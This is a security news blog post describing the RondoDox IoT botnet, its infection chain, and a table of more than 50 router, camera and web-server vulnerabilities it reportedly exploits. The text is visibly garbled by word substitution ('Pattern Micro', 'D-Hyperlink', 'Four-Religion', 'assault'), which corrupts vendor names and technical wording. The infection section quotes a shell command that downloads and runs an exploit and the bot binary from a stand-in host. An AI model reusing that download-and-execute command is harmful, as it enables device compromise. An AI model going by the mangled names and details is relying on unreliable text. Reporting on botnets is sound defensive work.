Skip to content
  • Blog Home
  • Cyber Map
  • About Us – Contact
  • Disclaimer
  • Terms and Rules
  • Privacy Policy
Cyber Web Spider Blog – News

Cyber Web Spider Blog – News

Globe Threat Map provides a real-time, interactive 3D visualization of global cyber threats. Monitor DDoS attacks, malware, and hacking attempts with geo-located arcs on a rotating globe. Stay informed with live logs and archive stats.

  • Home
  • Cyber Map
  • Cyber Security News
  • Security Week News
  • The Hacker News
  • How To?
  • Toggle search form

RondoDox Botnet Exploits 50+ Vulnerabilities to Attack Routers, CCTV Systems and Web Servers

Posted on October 10, 2025October 10, 2025 By CWS

Since its emergence in early 2025, RondoDox has quickly grow to be one of the pervasive IoT-focused botnets in operation, concentrating on a variety of network-connected gadgets—from client routers to enterprise CCTV methods and internet servers.

Its modular design permits operators to deploy tailor-made exploit modules towards over 50 distinct vulnerabilities, enabling swift compromise of disparate platforms.

In lots of assault campaigns, adversaries have leveraged automated scanning to determine uncovered gadgets, adopted by speedy exploitation and command-and-control enrollment.

Pattern Micro researchers recognized RondoDox in April 2025 after observing anomalous visitors patterns emanating from compromised DVR home equipment in a number of areas.

Subsequent evaluation revealed a core engine written in Go, facilitating cross-platform deployment and environment friendly binary dimension.

The botnet’s command protocols assist encrypted communications, guaranteeing stealthy C2 exchanges even underneath community monitoring.

Upon profitable exploitation, RondoDox deploys a light-weight persistence agent designed to outlive machine reboots and firmware updates.

This agent periodically polls C2 servers for brand new payloads or instructions, whereas self-healing routines reinstall elements if eliminated.

Infections often culminate within the machine taking part in large-scale DDoS assaults or clandestine proxying for subsequent risk operations.

An infection Mechanism

RondoDox’s an infection chain usually begins with a reconnaissance part wherein the malware’s scanning module probes gadgets for open Telnet (port 23), SSH (port 22), and HTTP administration interfaces.

As soon as a goal is recognized, the suitable exploit payload—drawn from its intensive repository— is delivered.

For example, in a single module, the scanner makes use of the CVE-2021-20090 router authentication bypass to execute a shell payload:-

wget http[:]//malicious.instance/exploit; chmod +x exploit
./ exploit – u admin – p ” – c ‘ wget http[:]//cdn[.]instance/rondox && chmod +x rondox && ./ rondox’

After preliminary code execution, the payload establishes an encrypted TLS channel again to C2 on port 443, disguising its visitors as legit HTTPS.

Pattern Micro analysts famous that this encryption scheme depends on a customized certificates bundle, complicating interception and inspection efforts.

As soon as communication is established, the bot requests and hundreds further modules—akin to community scanners or DDoS instruments—instantly into reminiscence.

The multi-stage an infection stream highlights the transition from reconnaissance to exploitation and persistence.

A timeline of the RondoDox vulnerability (Supply – Pattern Micro)

Following the an infection mechanism, RondoDox leverages device-specific persistence strategies, akin to crontab entries on Linux-based DVRs or firmware picture modification on sure router fashions, guaranteeing continued operation.

Its adaptability and broad exploit library underscore the pressing want for patch administration and community segmentation to mitigate this evolving risk.

The desk under offers an in depth overview of all 50+ vulnerabilities presently exploited by RondoDox, together with their CVE identifiers, affected merchandise, affect scores, required exploit stipulations, and CVSS 3.1 scores.

#Vendor / ProductCVE IDCWE / TypeStatusNotes1Nexxt Router FirmwareCVE-2022-44149CWE-78 (Command Injection)N-Day2D-Hyperlink RoutersCVE-2015-2051CWE-78N-Day3Netgear R7000 / R6400CVE-2016-6277CWE-78N-Day4Netgear (mini_httpd)CVE-2020-27867CWE-78N-Day5Apache HTTP ServerCVE-2021-41773CWE-22 (Path Traversal / RCE)N-Day6Apache HTTP ServerCVE-2021-42013CWE-22N-Day7TBK DVRsCVE-2024-3721CWE-78Targeted8TOTOLINK (setMtknatCfg)CVE-2025-1829CWE-78N-Day9Meteobridge Net InterfaceCVE-2025-4008CWE-78N-Day10D-Hyperlink DNS-320CVE-2020-25506CWE-78N-Day11Digiever DS-2105 ProCVE-2023-52163CWE-78N-Day12Netgear DGN1000CVE-2024-12847CWE-78N-Day13D-Hyperlink (a number of)CVE-2024-10914CWE-78N-Day14Edimax RE11S RouterCVE-2025-22905CWE-78N-Day15QNAP VioStor NVRCVE-2023-47565CWE-78N-Day16D-Hyperlink DIR-816CVE-2022-37129CWE-78N-Day17GNU Bash (ShellShock)CVE-2014-6271CWE-78 (Code Injection)N-Day / Historical18Dasan GPON Dwelling RouterCVE-2018-10561CWE-287 (Auth Bypass)N-Day19Four-Religion Industrial RoutersCVE-2024-12856CWE-78N-Day20TP-Hyperlink Archer AX21CVE-2023-1389CWE-78Targeted21D-Hyperlink RoutersCVE-2019-16920CWE-78N-Day22Tenda (fromNetToolGet)CVE-2025-7414CWE-78N-Day23Tenda (deviceName)CVE-2020-10987CWE-78N-Day24LB-LINK RoutersCVE-2023-26801CWE-78N-Day25Linksys E-SeriesCVE-2025-34037CWE-78N-Day26AVTECH CCTVCVE-2024-7029CWE-78N-Day27TOTOLINK X2000RCVE-2025-5504CWE-78N-Day28ZyXEL P660HN-T1ACVE-2017-18368CWE-78N-Day29Hytec HWL-2511-SSCVE-2022-36553CWE-78N-Day30Belkin Play N750CVE-2014-1635CWE-120 (Buffer Overflow)N-Day31TRENDnet TEW-411BRPplusCVE-2023-51833CWE-78N-Day32TP-Hyperlink TL-WR840NCVE-2018-11714CWE-78N-Day33D-Hyperlink DIR820LA1CVE-2023-25280CWE-78N-Day34Billion 5200W-TCVE-2017-18369CWE-78N-Day35Cisco (a number of merchandise)CVE-2019-1663CWE-119 (Reminiscence Corruption)N-Day36TOTOLINK (setWizardCfg)CVE-2024-1781CWE-78N-Day37Hikvision NVR—Command InjectionNo CVEListed by Pattern Micro w/o CVE38Dahua DVR—Distant Code ExecutionNo CVEListed by Pattern Micro w/o CVE39Wavlink Routers—CWE-78No CVEListed by Pattern Micro w/o CVE40ZTE ZXHN Router—CWE-78No CVEListed by Pattern Micro w/o CVE41Seenergy NVR—Authentication BypassNo CVEListed by Pattern Micro w/o CVE42Uniview NVR—CWE-78No CVEListed by Pattern Micro w/o CVE43TP-Hyperlink TD-W8960N—CWE-78No CVEListed by Pattern Micro w/o CVE44Dahua IP Digital camera—CWE-78No CVEListed by Pattern Micro w/o CVE45HiSilicon Firmware—Buffer OverflowNo CVEListed by Pattern Micro w/o CVE46Amcrest Digital camera—CWE-78No CVEListed by Pattern Micro w/o CVE47Hikvision IP Digital camera—CWE-78No CVEListed by Pattern Micro w/o CVE48LILIN Digital camera—CWE-78No CVEListed by Pattern Micro w/o CVE49TP-Hyperlink WR941N—CWE-78No CVEListed by Pattern Micro w/o CVE50Wavlink WL-WN575A3—CWE-78No CVEListed by Pattern Micro w/o CVE51Dahua NVR—CWE-78No CVEListed by Pattern Micro w/o CVE52Tenda AC6—CWE-78No CVEListed by Pattern Micro w/o CVE53Hikvision DS-7108HGHI—CWE-78No CVEListed by Pattern Micro w/o CVE54LB-LINK BL-WR450H—CWE-78No CVEListed by Pattern Micro w/o CVE55ZTE ZXHN H108N—CWE-78No CVEListed by Pattern Micro w/o CVE56Wavlink WL-WN531G3—CWE-78No CVEListed by Pattern Micro w/o CVE

Comply with us on Google Information, LinkedIn, and X to Get Extra On the spot Updates, Set CSN as a Most popular Supply in Google.

Cyber Security News Tags:Attack, Botnet, CCTV, Exploits, RondoDox, Routers, Servers, Systems, Vulnerabilities, Web

Post navigation

Previous Post: Cisco, Fortinet, Palo Alto Networks Devices Targeted in Coordinated Campaign
Next Post: Microsoft Warns of ‘Payroll Pirates’ Hijacking HR SaaS Accounts to Steal Employee Salaries

Related Posts

New Gmail Phishing Attack Uses AI Prompt Injection to Evade Detection Cyber Security News
Scattered Lapsus$ Hunters Launched a New Leak Site to Release Data Stolen from Salesforce Instances Cyber Security News
New Variant of The XCSSET Malware Attacking macOS App Developers Cyber Security News
Threat Actors Weaponizing Facebook and Google Ads as Financial Platforms to Steal Sensitive Data Cyber Security News
Record Breaking 7.3 Tbps DDoS Attack Blasting 37.4 Terabytes in Just 45 Seconds Cyber Security News
72 Vulnerabilities Fixed, Including 5 Actively Exploited Zero-Days Cyber Security News

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Recent Posts

  • New Chaosbot Leveraging CiscoVPN and Active Directory Passwords to Execute Network Commands
  • Nanoprecise partners with AccuKnox to strengthen its Zero Trust Cloud Security and Compliance Posture
  • Stealit Malware Abuses Node.js Single Executable Feature via Game and VPN Installers
  • In Other News: Gladinet Flaw Exploitation, Attacks on ICS Honeypot, ClayRat Spyware
  • 175 Malicious npm Packages With 26,000 Downloads Attacking Technology, and Energy Companies Worldwide

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Archives

  • October 2025
  • September 2025
  • August 2025
  • July 2025
  • June 2025
  • May 2025

Recent Posts

  • New Chaosbot Leveraging CiscoVPN and Active Directory Passwords to Execute Network Commands
  • Nanoprecise partners with AccuKnox to strengthen its Zero Trust Cloud Security and Compliance Posture
  • Stealit Malware Abuses Node.js Single Executable Feature via Game and VPN Installers
  • In Other News: Gladinet Flaw Exploitation, Attacks on ICS Honeypot, ClayRat Spyware
  • 175 Malicious npm Packages With 26,000 Downloads Attacking Technology, and Energy Companies Worldwide

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News